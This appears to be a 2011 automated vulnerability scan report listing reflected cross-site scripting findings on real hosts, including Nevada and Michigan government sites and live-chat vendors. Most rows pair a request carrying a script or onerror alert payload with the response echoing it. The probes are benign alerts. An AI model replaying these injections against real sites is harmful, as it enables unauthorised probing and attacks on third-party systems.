| GET /k/zvc4iwz-c-6179963-143 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:17:49 GMT Server: nginx/0.8.36 X-Runtime: 0.001059 Content-Length: 80 Not Found: /k/zvc4iwz-c-6179963-143 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c-6179963-147 |
| GET /kbf0cf<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:17:41 GMT Server: nginx/0.8.36 X-Runtime: 0.001864 Content-Length: 80 Not Found: /kbf0cf<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c-6179963-147 |
| GET /k/zvc4iwz-c-6179963-147 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:17:44 GMT Server: nginx/0.8.36 X-Runtime: 0.001129 Content-Length: 79 Not Found: /k/zvc4iwz-c-6179963-147 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c.css |
| GET /k605a9<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:16:37 GMT Server: nginx/0.8.36 X-Runtime: 0.001229 Content-Length: 68 Not Found: /k605a9<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c.css |
| GET /k/zvc4iwz-c.cssd5b02<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:16:41 GMT Server: nginx/0.8.36 X-Runtime: 0.000829 Content-Length: 67 Not Found: /k/zvc4iwz-c.cssd5b02<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://frwebgate.access |
| Path: | /cgi-bin/getdoc.cgi |
| GET /cgi-bin/getdoc.cgi?6f6ed<script>alert(1)< Host: frwebgate.access.gpo.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:20:42 GMT Server: Apache/2.2.3 (Red Hat) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11294 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html><!-- InstanceBegin template="/Templates ...[SNIP]... <H1>Invalid variable in query string [6f6ed<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /cmd/hic |
| GET /cmd517d6<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=QfuX2q273YN8 |
| HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sat, 30 Apr 2011 22:10:04 GMT Content-Length: 562 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /cmd517d6<script>alert(1)< </pre> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js53eab<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sat, 30 Apr 2011 22:10:05 GMT Content-Length: 574 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /js53eab<script>alert(1)< </pre> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js/hicce743<a>741cad1e216/safe-standard.js?ps_h Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sat, 30 Apr 2011 22:10:05 GMT Content-Length: 556 <html> <body> <h2>Error 404: Not Found</h2> <pre> Page: /js/hicce743<a>741cad1e216/safe-standard.js?ps_h </pre> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js/hic/safe-standard.js Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=JeUKDNrsBTvD;Path=/ Content-Length: 4989 Date: Sat, 30 Apr 2011 22:10:04 GMT Connection: close var psMygbsid = "JeUKDNrsBTvD"; // safe-standard@gecko.js var psMygbiso; try { psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null); } catch(e) { psMygb ...[SNIP]... <img name="psMygbimage" src="http://www.ehawaii ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js/hic/safe-standard.js Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=9kuM6onKqeiW;Path=/ Content-Length: 4989 Date: Sat, 30 Apr 2011 22:10:04 GMT Connection: close var psMygbsid = "9kuM6onKqeiW"; // safe-standard@gecko.js var psMygbiso; try { psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null); } catch(e) { psMygb ...[SNIP]... bco() { var w1 = psMygbci.width - 1; psMygbol = (w1 & 1) != 0; psMygbsb(psMygbol ? "http://www.ehawaii.gov psMygbscf((w1 & 2) != 0); var h = psMygbci.height; if (h != 2) { psMygbop = false; } else if ((h == 2) && (!psMygbop)) { psMygbop = true; psMygbsi(); } } var psMygbci = new Image(); psMy ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js/hic/safe-standard.js Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.ehawaii.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=egvv6GBH2Aoz;Path=/ Content-Length: 4905 Date: Sat, 30 Apr 2011 22:10:04 GMT Connection: close var psMygbsid = "egvv6GBH2Aoz"; // safe-standard@gecko.js var psMygbiso; try { psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null); } catch(e) { psMygb ...[SNIP]... bd.innerHTML = ''; } } var psMygbop = false; function psMygbco() { var w1 = psMygbci.width - 1; psMygbol = (w1 & 1) != 0; psMygbsb(psMygbol ? "http://www.ehawaii.gov psMygbscf((w1 & 2) != 0); var h = psMygbci.height; if (h != 2) { psMygbop = false; } else if ((h == 2) && (!psMygbop)) { psMygbop ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-textlink.js |
| GET /jsf1fbe<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: image.providesupport.com |
| HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sat, 30 Apr 2011 22:18:29 GMT Content-Length: 565 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /jsf1fbe<script>alert(1)< </pre> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://image.provide |
| Path: | /js/hic/safe-textlink.js |
| GET /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: image.providesupport.com |
| HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Sat, 30 Apr 2011 22:18:29 GMT Content-Length: 551 <html> <body> <h2>Error 404: Not Found</h2> <pre> Page: /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h </pre> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://iot.custhelp.com |
| Path: | /cgi-bin/iot.cfg/php |
| GET /cgi-bin/iot.cfg/php Host: iot.custhelp.com Proxy-Connection: keep-alive Referer: http://in.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:39:06 GMT Server: Apache P3P: policyref="http://iot Content-Length: 1083 RNT-Time: D=94886 t=1304127546706345 RNT-Machine: 02 X-Cnection: close Content-Type: text/javascript; charset="utf-8" RNTFeed.readers[0] ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://iot.custhelp.com |
| Path: | /cgi-bin/iot.cfg/php |
| GET /cgi-bin/iot.cfg/php Host: iot.custhelp.com Proxy-Connection: keep-alive Referer: http://in.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:40:07 GMT Server: Apache P3P: policyref="http://iot Content-Length: 1084 RNT-Time: D=93452 t=1304127607569699 RNT-Machine: 10 X-Cnection: close Content-Type: text/javascript; charset="utf-8" RNTFeed.readers[0] ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://iot.custhelp.com |
| Path: | /cgi-bin/iot.cfg/php |
| GET /cgi-bin/iot.cfg/php Host: iot.custhelp.com Proxy-Connection: keep-alive Referer: http://in.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:38:12 GMT Server: Apache P3P: policyref="http://iot Content-Length: 1091 RNT-Time: D=114668 t=1304127492040349 RNT-Machine: 10 X-Cnection: close Content-Type: text/javascript; charset="utf-8" RNTFeed.readers[0] ...[SNIP]... RSS","link":"http:\/\/iot |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://jqueryui.com |
| Path: | /themeroller/ |
| GET /themeroller/?4c5b3"><script>alert(1)< Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 30 Apr 2011 12:21:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 117123 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://kodakimagingn |
| Path: | /m2/kodakimagingnetworki |
| GET /m2/kodakimagingnetworki Host: kodakimagingnetworki.tt Proxy-Connection: keep-alive Referer: http://www.kodakgallery User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 211 Date: Sat, 30 Apr 2011 15:09:12 GMT Server: Test & Target mboxFactories.get( |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://landmark-project |
| Path: | /feed2js/feed2js.php |
| GET /feed2js/feed2js.php?src Host: landmark-project.com Proxy-Connection: keep-alive Referer: http://dola.colorado.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:23:30 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.17 Content-Length: 775 Content-Type: text/html; charset=UTF-8 document.write('<div class="rss-box">'); document.write('<p class="rss-item"><em ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://newbrowse |
| Path: | /servlet/lhBrowse |
| GET /servlet/lhBrowsea0096<img%20src%3da Host: newbrowse.livehelper.com Proxy-Connection: keep-alive Referer: http://ia.gov/livehelp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: searsTest=TEST |
| HTTP/1.1 404 Not found Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 11:22:15 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Content-Length: 101 Error. The file was not found. (servlet name = lhBrowsea0096<img src=a onerror=alert(1) |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://newbrowse |
| Path: | /servlet/lhBrowse |
| GET /servlet/lhBrowse9383a<a>7d6250d00fe HTTP/1.1 Host: newbrowse.livehelper.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: searsTest=TEST; st1099892=135396595z2011 |
| HTTP/1.1 404 Not found Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 12:23:35 GMT Content-Type: text/html; charset=iso-8859-1 Connection: close Content-Length: 76 Error. The file was not found. (servlet name = lhBrowse9383a<a>7d6250d00fe) |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://newbrowse |
| Path: | /servlet/lhBrowse |
| GET /servlet/lhBrowse65f8b<a%20b%3dc Host: newbrowse.livehelper.com Proxy-Connection: keep-alive Referer: http://ia.gov/livehelp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not found Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 11:12:55 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Content-Length: 80 Error. The file was not found. (servlet name = lhBrowse65f8b<a b=c>8434f8e4e43) |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://newbrowse |
| Path: | /servlet/lhBrowse |
| GET /servlet/lhBrowse?ACTION Host: newbrowse.livehelper.com Proxy-Connection: keep-alive Referer: http://ia.gov/livehelp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 11:12:40 GMT Content-Type: text/javascript Connection: keep-alive X-Powered-By: ASP.NET P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR Pragma: no-cache Cache-Control: no-store Set-Cookie: searsTest=TEST; domain=.livehelper.com Content-Length: 199 var obj;var str ={"opstatus":0, |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://newchat.livehelper |
| Path: | /servlet/lhChat |
| GET /servlet/lhChatca390<img%20src%3da Host: newchat.livehelper.com Proxy-Connection: keep-alive Referer: http://ia.gov/livehelp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not found Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 11:12:38 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Content-Length: 99 Error. The file was not found. (servlet name = lhChatca390<img src=a onerror=alert(1) |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://newchat.livehelper |
| Path: | /servlet/lhChat |
| GET /servlet/lhChat?ACTION Host: newchat.livehelper.com Proxy-Connection: keep-alive Referer: http://ia.gov/livehelp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 11:12:29 GMT Content-Type: text/javascript Connection: keep-alive P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR Content-Length: 132 var obj;var str ={"windowsize":1};obj = eval(str);var id = parseInt(084b16;alert(1)/ |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://nv.gov |
| Path: | /workarea/csslib |
| GET /workarea/csslib Host: nv.gov Proxy-Connection: keep-alive Referer: http://nv.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Type: text/css; charset=utf-8 Expires: Sun, 29 Apr 2012 11:15:20 GMT Last-Modified: Sat, 30 Apr 2011 11:15:20 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 11:15:20 GMT Content-Length: 11064 .ektronWindow{display ...[SNIP]... Area/images/application /* ######################### /* ektron registered stylesheet: css file not found */ /* id: EktronBubbleCss38767<script>alert(1)< /* path: /* ######################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://nv.gov |
| Path: | /workarea/java/ektronJs |
| GET /workarea/java/ektronJs Host: nv.gov Proxy-Connection: keep-alive Referer: http://nv.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Type: application/javascript; charset=utf-8 Expires: Sun, 29 Apr 2012 11:15:36 GMT Last-Modified: Sat, 30 Apr 2011 11:15:36 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 11:15:35 GMT Content-Length: 266 //####################### //ektron registered javascript: js file not found //id: EktronWebToolBarJS726f8<script>alert(1)< //path: //####################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://olt.custhelp.com |
| Path: | /cgi-bin/olt.cfg/php |
| GET /cgi-bin/olt.cfg/php Host: olt.custhelp.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 21:20:49 GMT Server: Apache P3P: policyref="https://olt Set-Cookie: rnw_enduser_login_start RNT-Time: D=69577 t=1304112049847679 RNT-Machine: 02 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12015 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en_US"> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>> ...[SNIP]... <a class="tab" name=" answers ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://onestop.michigan |
| Path: | /OneStop/ssoNeedPassword |
| GET /OneStop/ssoNeedPassword Host: onestop.michigan.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found connection: close content-language: en content-type: text/html; charset=ISO-8859-1 date: Sat, 30 Apr 2011 12:24:47 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 3711 $wsep: cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Fonestop-main <!-- Michigan Business One Stop Portal: 902 --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <ht ...[SNIP]... <!-- Application Excepiton: java.io.FileNotFound ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://onestop.michigan |
| Path: | /onestop-main/OneStop/css |
| GET /onestop-main/OneStop/css Host: onestop.michigan.gov Connection: keep-alive Referer: https://onestop.michigan User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PD-S-SESSION-ID-M=2_0 |
| HTTP/1.1 404 Not Found connection: close content-language: en-US content-type: text/html; charset=ISO-8859-1 date: Sat, 30 Apr 2011 12:28:23 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 3697 $wsep: <!-- Michigan Business One Stop Portal: 902 --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <ht ...[SNIP]... <!-- Application Excepiton: java.io.FileNotFound ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://onestop.michigan |
| Path: | /onestop-main/OneStop/css |
| GET /onestop-main/OneStop/css Host: onestop.michigan.gov Connection: keep-alive Referer: https://onestop.michigan User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AMWEBJCT!%2Fonestop-main |
| HTTP/1.1 404 Not Found connection: close content-language: en-US content-type: text/html; charset=ISO-8859-1 date: Sat, 30 Apr 2011 12:27:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 3701 $wsep: <!-- Michigan Business One Stop Portal: 902 --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <ht ...[SNIP]... <!-- Application Excepiton: java.io.FileNotFound ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://onestop.michigan |
| Path: | /onestop-main/OneStop |
| GET /onestop-main/OneStop Host: onestop.michigan.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
